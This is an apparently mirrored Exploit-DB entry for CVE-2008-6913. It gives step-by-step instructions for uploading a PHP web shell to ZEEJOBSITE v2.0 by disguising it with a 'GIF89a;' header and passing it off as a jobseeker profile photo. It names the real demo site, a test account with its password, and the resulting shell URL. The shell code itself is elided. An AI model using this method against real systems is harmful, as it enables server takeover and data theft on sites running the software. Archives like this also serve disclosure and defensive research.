- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 7062
- Проверка EDB
-
- Пройдено
- Автор
- ZORLU
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-6913
- Дата публикации
- 2008-11-08
Код:
ZEEJOBSITE v2.0 remote file Upload
author: ZoRLu msn: [email protected]
home: www.z0rlu.blogspot.com
dork: "[email protected]"
date: 08/11/2008 ( aha simdi gönderiyorum saat 10:40 : ) )
first register to site
you add this code your shell to head
GIF89a;
example your_shell.php:
GIF89a;
<?
...
...
...
?>
and save your_sheell.php
after jobseekers login to site ( direckt link: localhost/jobseekers/jobseekerloginpage.php )
and you edit your profile ( direckt link: http://localhost/jobseekers/editresume_next.php?rid=[id] )
add your photo ( you_shell.php upload ) after open new page you right clik your photo and select to properties
copy photo link and paste your explorer go your shell
your_shell:
localhost/script_path/jobseekers/logos/[id].php
example for demo:
user: sabrina
passwd: testing:
login: http://zeejobsite.com/jobseekers/jobseekerloginpage.php
change profile direckt link: http://zeejobsite.com/jobseekers/editresume_next.php?rid=47
and your_shell link:
http://zeejobsite.com/jobseekers/logos/7271406.php
thanks: str0ke & yildirimordulari.org & darkc0de.com
# milw0rm.com [2008-11-08]- Источник
- www.exploit-db.com
